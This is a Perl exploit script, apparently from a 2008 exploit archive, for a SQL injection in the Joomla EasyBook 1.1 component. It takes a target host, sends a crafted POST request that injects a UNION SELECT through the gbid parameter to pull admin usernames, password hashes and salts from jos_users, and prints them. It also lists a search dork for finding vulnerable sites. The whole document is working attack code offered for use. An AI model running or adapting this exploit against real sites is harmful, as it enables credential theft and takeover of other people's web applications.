joomlaeasy-sql.txt
Posted on 05 June 2008
#!/usr/bin/perl use IO::Socket; use strict; ##### INFO############################## # Example: # # Host: xxx.lu # # &md: 0f8ab366793a0d1da85c6f5a8d4fb576# ######################################## print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+- "; print "-+-- --+- "; print "-+-- Author: ZAMUT --+- "; print "-+-- Vuln: gbid= --+- "; print "-+-- Homepage: http://antichat.ru --+- "; print "-+-- Dork: com_easybook --+- "; print "Host:" ; chomp(my $host=<STDIN>); print "&md="; chomp(my $md=<STDIN>); my ($socket,$lhs,$l,$h,$s); $socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!"); print $socket "POST /index.php HTTP/1.0 ". "Host: www.$host ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: 214 ". "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md "; while(<$socket>) { $s = <$socket>; if($s=~/:::(.+):::/){ $lhs = $1; ($l,$h,$s)=split(':',$lhs); print " Admin Login:$l Hash:$h Salt:$s "; close $socket; exit; } } die ("Exploit failed!");
